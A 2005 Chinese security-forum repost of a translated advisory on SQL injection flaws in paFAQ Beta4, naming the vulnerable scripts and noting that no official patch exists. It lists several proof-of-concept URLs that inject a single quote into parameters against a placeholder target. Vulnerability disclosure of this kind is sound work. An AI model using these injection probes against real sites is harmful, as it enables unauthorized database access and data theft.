[转载]paFAQ输入合法性漏洞导致SQL注入攻击

hak_ban[HSG]

晶莹剔透§烈日灼然

Rank: 1

E.S.T论坛贵宾

帖子: 137
精华: 4
积分: 3301
阅读权限: 60
性别: 男
在线时间: 0 小时
注册时间: 2004-10-21
最后登录: 2005-7-29

发短消息
加为好友
当前离线

楼主大中小发表于 2005-2-19 23:41 只看该作者

[转载]paFAQ输入合法性漏洞导致SQL注入攻击

翻译;Z.C.Y[B.C.T]
翻译网站：HTTP://WWW.BNSO.NET/
安全警告ID：1013232
资料来源：http://securitytracker.com/id?1013232
CVE 参考：http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH
发布日期：2005-2-18
发布作者：Pi3cH of PersianHacker.NET Security Team
漏洞影响：泄露系统信息，泄露用户信息，用户操作
含有利用方法：是
影响版本：Beta4

描述：几处输入合法性漏洞存在于paFAQ。远程用户可以注入SQL指令。
几个脚本对用户提交给某些参数的输入值并没有验证完全。其中'question.php', 'answer.php', 'search.php', 和 'comment.php'
脚本受到影响。远程用户可以提交一个精心构造地址在存在的数据库中执行任意的SQL指令。

提供如下利用方法：
http://[target]/index.php?act=Question&id=1&limit=10&orderby=q_id&order=DESC&offset='
http://[ta rget]/index.php?act=Question&id=1&orderby=q_id&order=DESC&limit='
http://[target]/index.php?act=Question&id=1&orderby=q_id&order='&limit=10
http://[target]/index.php?ac t=Question&id=1&orderby='&order=DESC&limit=10
http://[target]/index.php?act=Answer&cid=1&id=1&offset='
http://[target]/index.php?act=Search&code=01&search_item='
http: //[target]/index.php?act=Speak&code=05&poster=1&name=2&question=3&email=4&cat_id='
http://[target]/index.php?act=Speak&code=02&cid='&id=1&poster=1&name=2&answer=3&email= 4
http://[target]/index.php?act=Speak&code=02&cid=1&id='&poster=1&name=2&answer=3&email=4

漏洞影响：远程用户可以执行任意SQL指令
解决方法：目前没有官方补丁
官方地址：http://www.phparena.net/pafaq.php
漏洞起因：输入合法性错误
影响系统：所有的Linux, UNIX

白痴狗将会离我们而去, 需要怀念白痴狗的朋友, 请发消息给白痴狗的QQ (PS:白痴狗QQ会永远在网上开着)

TOP

‹‹ 上一主题 | 下一主题 ››

邪恶八进制信息安全团队技术讨论组 » 重要安全公告{ Security Advisory Bulletin } » 漏洞分析[ Vulnerability Analyse ] » [转载]paFAQ输入合法性漏洞导致SQL注入攻击